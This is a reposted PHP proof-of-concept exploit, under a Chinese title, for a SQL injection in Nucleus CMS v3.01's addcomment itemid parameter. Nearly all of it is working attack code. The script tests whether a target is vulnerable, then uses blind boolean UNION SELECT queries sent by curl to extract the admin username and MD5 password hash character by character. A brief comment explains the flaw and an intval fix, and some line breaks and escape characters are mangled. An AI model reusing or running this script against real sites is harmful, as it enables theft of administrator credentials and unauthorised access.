最新sql溢出源代码（概念版）

最新sql溢出源代码（概念版）

#!/usr/bin/php

<?

// Nucleus CMS v3.01 addcoment/itemid SQL Injection Proof of Concept
// By aCiDBiTS           acidbits@hotmail.com           24-July-2004
//
// Nucleus CMS (http://nucleuscms.org) is a weblog php+mysql application.
//
// This Proof of Concept dumps the username and MD5(password) of the admin
user placed at first position
// of members table. First of all checks if we can use "union select" or it
isn't patched and then if first
// member is admin.
//
// Usage (in my debian box):
// php4 -q nuc_addc_poc.php URL

// Vulnerability description
//
// In action.php, function addcoment, there's no user input sanization for
parameter itemid. In line 65:
// $blogid = getBlogIDFromItemID($post['itemid']);
// This allows to inject SQL to get data form the database.
//
// Solution
//
// Modify line 65 with:
// $blogid = getBlogIDFromItemID(intval($post['itemid']));

 

     
echo
"+-------------------------------------------------------------------+/n|
Nucleus CMS v3.01 addcoment/itemid SQL Injection Proof of Concept |/n| By
aCiDBiTS           acidbits@hotmail.com           24-July-2004
|/n+-------------------------------------------------------------------+/n/n
";

if($argc<2) die("Usage: ".$argv[0]." URL/n/n");
$host=$argv[1];
if(substr($host,strlen($host)-1,1)!='/') $host.='/';

echo "Checking if vulnerable and /"union select/" works ... ";
if( test_cond("1") && !test_cond("0") )  echo "OK!/n";
else die( "It doesn't :-(/n/n" );

echo "Checking if first member of table is admin ... ";
if( test_cond("1") )  echo "OK!/n";
else die( "It's not :-(/n/n" );

echo "/nGetting username: ";
get_field("mname");
echo "/nGetting MD5(password): ";
get_field("mpassword");

die("/n/nDone!/n/n");

function get_field( $field )
{
 $unval= "
0123456789ABCDEFGHIJKLMNOPRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
 $idx=1;
 $min=0;
 $max=strlen($unval);
 while($min!=$max) {
  $mid=$min+(($max-$min)/2);
  if(
test_cond("ord(substring($field,$idx,1))=".ord(substr($unval,$mid,1))) ) {
   $idx++;
   echo substr($unval,$mid,1);
   $min=0;
   $max=strlen($unval);
   if( !test_cond("ord(substring($field,$idx,1))") )
return;
  } else {
   if(
test_cond("ord(substring($field,$idx,1))<".ord(substr($unval,$mid,1))) )
$max=$mid;
   else $min=$mid;
  }
 }
 die( "/n/nUnexpected error!/n/n");
}

function test_cond( $cond )
{
 
$res=send_post("action=addcomment&url=index.php%3Fitemid%3D1&itemid=1+and+0+
union+select+1+from+nucleus_member+where+madmin+and+mnumber=1+and+".urlencod
e($cond)."&body=a&user=a&userid=");
    if( eregi( "nucleus_ban", $res ) )
  return 0;
 else return 1;
}

function send_post($data)
{
 global $host;
 $ch=curl_init();
 curl_setopt ($ch, CURLOPT_URL, $host."action.php" );
 curl_setopt ($ch, CURLOPT_HEADER, 0);
 curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
 curl_setopt ($ch, CURLOPT_POST, 1);
 curl_setopt ($ch, CURLOPT_POSTFIELDS, $data );
 $data=curl_exec ($ch);
 curl_close ($ch);

 return $data;
}

?>